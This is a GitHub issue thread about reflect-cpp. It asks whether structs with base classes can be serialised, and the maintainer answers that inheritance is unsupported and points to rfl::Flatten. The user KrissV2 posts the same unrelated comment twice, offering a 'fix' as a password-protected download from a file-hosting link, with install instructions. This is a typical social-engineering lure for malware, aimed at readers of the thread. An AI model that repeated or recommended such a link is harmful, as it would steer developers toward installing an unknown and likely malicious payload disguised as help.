### ISSUE TITLE
Support to base class

### ISSUE THREAD

**Issue by nanoric** [getml/reflect-cpp#179]
I'm trying to use reflect-cpp in my project and gets errors:
```
struct Base{
    int base;
};
struct A:Base{
    int a;
};
void test()
{
    A a;
    auto str = rfl::json::write(a);
}
```

It seems that class which has a base class will be treated as tuple.
Is here any future plan to support base classes?

----- 

PS: Is here any list of supported/unsupported features?
For example:

For serialize & inspect:
  - [x] ranges like container(std::vector, std::array, std::map, etc)
  - [x] std::tuple, std::pair (compile-time container that supports std::get)
  - [x] C-style array
  - [ ] Member pointer
  - [ ] Base class(es)
  - [ ] bit field
  
For inspect only:
  - [ ] member pointer (get field name, pointed type)
  - [ ] member function pointer(get filed name, return type, types of arguments)
  - [ ] bit field ( name, offset in bits, size in bits)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by liuzicheng1987** [comment]
Unfortunately you cannot use inheritance, at least not like this. This is due to restrictions imposed by C++. You can use rfl::Flatten instead.

**Comment by liuzicheng1987** [comment]
There is a list of supported containers in the README.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
